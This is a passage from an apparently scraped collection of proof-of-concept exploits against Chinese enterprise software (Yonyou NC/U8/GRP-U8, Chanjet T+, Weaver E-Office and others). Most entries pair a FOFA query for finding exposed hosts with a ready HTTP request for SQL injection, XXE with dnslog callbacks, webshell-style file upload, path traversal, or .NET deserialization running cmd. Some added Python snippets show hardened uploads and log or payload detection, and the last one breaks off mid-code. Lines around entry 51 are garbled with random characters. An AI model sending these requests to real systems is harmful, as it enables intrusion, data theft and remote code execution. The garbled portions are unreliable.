GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The accessToken header is the static token published with this PoC; the write location comes from the multipart filename, which the server uses as a relative path.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

The DOCTYPE sits inside a CDATA section, so the outer SOAP parser passes it through as a string and the service parses it a second time.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

This is an error-based probe: on MSSQL the hex string of MD5('123456') cannot be compared to 0, and the resulting conversion error echoes the hash back.

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

Unlike the GET-based entries, the payload here travels in the SOAP body, so it does not appear in web server access logs.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

123
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

The DontCheckLogin=1 query parameter is what lets the request through unauthenticated.

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

Note the trailing space in filename="%s.php " (the %s is the scanner's placeholder for a random name). Resulting file URL:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

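
Entries 24, 28, 35, 48 and 49 (and 61 further down) all rest on the same server-side mistake: a name supplied by the client, whether a form field such as fname, the multipart filename=, or a fileType/filename query parameter, is joined onto a server path, so the client chooses both the directory and the executable extension. The code below is an added example, not code from Yonyou or from the original post. It puts a mirror of that behaviour beside a hardened replacement; every path in it (APP_HOME, WEB_ROOT, UPLOAD_DIR) is assumed for illustration.

```python
"""Client-supplied file names: the pattern behind entries 24, 28, 35, 48, 49
and 61, beside a hardened replacement.

Added example; not code from Yonyou or from the original post. All paths are
assumed for illustration.
"""
import os
import secrets
from pathlib import Path

APP_HOME = Path("/srv/app")                      # assumed install dir (NC_HOME)
WEB_ROOT = APP_HOME / "webapps" / "nc_web"       # assumed; served by the app server
UPLOAD_DIR = Path("/srv/uploads")                # assumed; not under APP_HOME
ALLOWED_EXT = {".txt", ".jpg", ".png", ".pdf"}   # allowlist: no .jsp/.php/.aspx

def vulnerable_target(client_name: str) -> Path:
    """Mirror of the affected behaviour: join the client's name under APP_HOME.

    Separators and '..' are honoured, so the client picks the directory, and
    the extension is whatever the client sent.
    """
    joined = str(APP_HOME) + "/" + client_name.replace("\\", "/")
    return Path(os.path.normpath(joined))

def safe_target(client_name: str) -> Path:
    """Storage path the client cannot influence beyond an allowlisted extension.

    Rejects rather than sanitizes: separators, NUL, '..', and names padded
    with trailing spaces or dots (entry 49's 'x.php ' counts on a stack that
    strips the space only after checking the extension). The stored name is
    random, so nothing of the original reaches the disk.
    """
    if "\x00" in client_name:
        raise ValueError("NUL byte in file name")
    if "/" in client_name or "\\" in client_name:
        raise ValueError("path separator in file name")
    if client_name != client_name.strip(" .") or client_name in ("", ".", ".."):
        raise ValueError("empty, dot-only or space/dot padded file name")
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    target = (UPLOAD_DIR / (secrets.token_hex(16) + ext)).resolve()
    if UPLOAD_DIR.resolve() not in target.parents:   # defence in depth
        raise ValueError("resolved path escaped the upload directory")
    return target

def is_served(path: Path) -> bool:
    """True if the app server would serve (and, for .jsp, execute) this path."""
    return WEB_ROOT == path or WEB_ROOT in path.parents

if __name__ == "__main__":
    for name in ["\\webapps\\nc_web\\x.jsp", "./webapps/nc_web/1.jsp", "s.php ", "report.pdf"]:
        v = vulnerable_target(name)
        print(f"{name!r:32} vulnerable -> {v} served={is_served(v)}")
        try:
            print(f"{'':32} safe       -> {safe_target(name)}")
        except ValueError as e:
            print(f"{'':32} safe       -> refused: {e}")
```

The two NC names from entries 24 and 35 both resolve to a .jsp under WEB_ROOT in the vulnerable join and are refused outright by the hardened one; a name that passes keeps only its extension, lands outside the web root, and gets a fresh random name on every call, so a second upload can never overwrite the first.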

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

! v5 B9 h' {! P
. K; g* ^6 `3 z$ D0 K" I
. E# d5 H/ M2 l6 \- F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
) A; p% u+ F2 _5 AFOFA:app="云时空社会化商业ERP系统"
6 t0 ^' B! N1 K$ `GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
3 B6 n0 ]% O2 b; Z( I6 @Host: your-ip/ |8 n5 \' [" h$ n0 p$ L5 \$ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36: b# ?/ ~  G5 p7 x$ T( J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  n6 a/ t& `$ a# J9 N  pAccept-Encoding: gzip, deflate3 }: I$ B7 K* H4 \) n
Accept-Language: zh-CN,zh;q=0.9; ~1 z8 e5 B; R# s- w
Connection: close$ A! \+ W4 N$ w3 |* E8 n3 U
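
Most of the SQL injection entries above are time-based blind probes: MSSQL "waitfor delay" in entries 26, 30, 31, 32, 33, 34, 41, 43, 44 and 46, and Oracle DBMS_PIPE.RECEIVE_MESSAGE in entries 27, 29 and 51. Because the payload asks the database to stall for five seconds, a defender can tell attempts from successes by reading the response time next to the request. The script below is an added example, not code from the original post or from any vendor; it goes beyond the page by also matching MySQL and PostgreSQL sleep primitives. The log format, client addresses and timestamps are constructed; the query strings are copied from the entries above.

```python
"""Find time-based blind SQL injection probes in web access logs.

Added example; not code from the original post or from any vendor. The log
lines are constructed; their query strings are this page's payloads.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Matched against the lower-cased, URL-decoded, whitespace-collapsed query.
TIME_PROBES = {
    "mssql":    re.compile(r"waitfor\s+delay\s+'"),
    "oracle":   re.compile(r"dbms_pipe\.receive_message\s*\("),
    "mysql":    re.compile(r"(?<![a-z_])(?:sleep|benchmark)\s*\("),
    "postgres": re.compile(r"pg_sleep\s*\("),
}

# Combined log format with the upstream response time appended as the last
# field (nginx $upstream_response_time style); adjust to your own format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<rt>[\d.]+)$'
)

def normalize(query: str) -> str:
    """Decode twice (scanners double-encode: %2527 -> %27 -> ') and fold whitespace.

    Double decoding turns a legitimate literal '%2B' into a space; acceptable
    for detection, not for anything that acts on the value.
    """
    return re.sub(r"\s+", " ", unquote_plus(unquote_plus(query))).lower()

def classify(url: str) -> Optional[str]:
    """DBMS family of a time-based probe in the URL's query string, else None."""
    query = url.split("?", 1)[1] if "?" in url else ""
    norm = normalize(query)
    for family, pattern in TIME_PROBES.items():
        if pattern.search(norm):
            return family
    return None

Hit = Tuple[str, str, str, bool]   # (client ip, url, dbms family, confirmed)

def scan_access_log(lines, slow_seconds: float = 4.0) -> List[Hit]:
    """Return one Hit per probe request.

    'confirmed' means the server took at least slow_seconds to answer. The
    payloads on this page ask for a 5 s delay, so a ~5 s response to a
    'waitfor delay' URL says the injection executed, not merely that it was
    attempted; those are the hits to triage first.
    """
    hits: List[Hit] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        family = classify(m["url"])
        if family is not None:
            hits.append((m["ip"], m["url"], family, float(m["rt"]) >= slow_seconds))
    return hits

# Constructed log lines; the query strings are this page's payloads.
SAMPLE_LOG = [
    '10.0.0.7 - - [12/May/2024:10:01:02 +0800] "GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1%27waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 512 "-" "Mozilla/5.0" 5.012',
    '10.0.0.7 - - [12/May/2024:10:01:09 +0800] "GET /ebvp/infopub/showcontent?id=1%27+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" 200 77 "-" "Mozilla/5.0" 0.031',
    '10.0.0.9 - - [12/May/2024:10:02:00 +0800] "GET /u8qx/sqcxIndex.jsp?key=1%27);+waitfor+delay+%270:0:5%27-- HTTP/1.1" 500 0 "-" "curl/8.0" 5.201',
    '10.0.0.9 - - [12/May/2024:10:02:30 +0800] "GET /api/items?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 30 "-" "curl/8.0" 0.020',
    '10.0.0.2 - - [12/May/2024:10:03:00 +0800] "GET /portal/pt/erfile/down/bill?pageId=login&id=42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0" 0.110',
]

if __name__ == "__main__":
    for ip, url, family, confirmed in scan_access_log(SAMPLE_LOG):
        print(f"{ip:10} {family:8} {'CONFIRMED' if confirmed else 'attempt'}   {url}")
```

Access logs only carry the URL, so a body-borne payload such as entry 43's SOAP request is invisible here; run classify() over request bodies at the reverse proxy or WAF to cover those.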

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Note: the only request recorded for this entry is a path-traversal read of /etc/passwd (the probe used to confirm the flaw); no upload request is given.

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. The command it executes writes a marker string into a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
      }
    }
  }
}

Step 2: request the following URL; the marker string in the response confirms command execution:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie from the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: with that Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

The gadget is the same as in entry 54: the client-chosen __type makes the deserializer build an ObjectDataProvider whose MethodName "Start" is invoked on a Process object, so the command in Arguments runs before any business logic sees the request.

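
Entry 23 and entries 54/56 are the same class of bug in two ecosystems: fastjson honours a client-supplied "@type" key, and the AjaxPro/.NET deserializer honours "__type", so in both the client names the class to instantiate. The walker below is an added example, not code from the original post, Alibaba or Chanjet: it reports every type hint in a JSON body and escalates when the class is a known gadget. The two attack bodies are copied from entries 23 and 56; the benign ones are constructed; KNOWN_GADGETS is a starting denylist, not a complete one.

```python
"""Flag polymorphic type hints ("@type" / "__type") in JSON request bodies.

Added example; not code from the original post, from Alibaba or from
Chanjet. FASTJSON_PROBE and TPLUS_RCE are the bodies printed on this page;
BENIGN and SUSPICIOUS are constructed.
"""
import json
import re
from typing import Any, List, Tuple

TYPE_KEYS = ("@type", "__type")
KNOWN_GADGETS = (
    "java.net.URL",
    "com.sun.rowset.JdbcRowSetImpl",
    "com.alibaba.fastjson.JSONObject",
    "System.Windows.Data.ObjectDataProvider",
    "System.Diagnostics.Process",            # also matches ProcessStartInfo
)
# Fallback for bodies that a strict JSON parser rejects.
HINT_RE = re.compile(r'"(@type|__type)"\s*:\s*"([^"]*)"')

Hint = Tuple[str, str, str]   # (json path, key, class name)

def _class_name(value: str) -> str:
    """.NET hints carry assembly info after the first comma; drop it."""
    return value.split(",", 1)[0].strip()

def walk(obj: Any, path: str = "$") -> List[Hint]:
    found: List[Hint] = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key in TYPE_KEYS and isinstance(value, str):
                found.append((path, key, _class_name(value)))
            found.extend(walk(value, f"{path}.{key}"))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            found.extend(walk(value, f"{path}[{i}]"))
    return found

def extract_hints(body: str) -> List[Hint]:
    try:
        return walk(json.loads(body))
    except ValueError:
        # fastjson accepts input that strict parsers reject; entry 23's body is
        # exactly that (an object nested where a key is expected). A check that
        # treats "not JSON" as "not dangerous" therefore misses it, so fall
        # back to a textual scan.
        return [("?", k, _class_name(v)) for k, v in HINT_RE.findall(body)]

def assess(body: str) -> str:
    """'clean', 'suspicious' (any type hint) or 'gadget' (known class named)."""
    hints = extract_hints(body)
    if not hints:
        return "clean"
    if any(cls.startswith(KNOWN_GADGETS) for _, _, cls in hints):
        return "gadget"
    return "suspicious"

# Entry 23 body, verbatim (not well-formed JSON).
FASTJSON_PROBE = '''{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}'''
# Entry 56 body, verbatim.
TPLUS_RCE = '''{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
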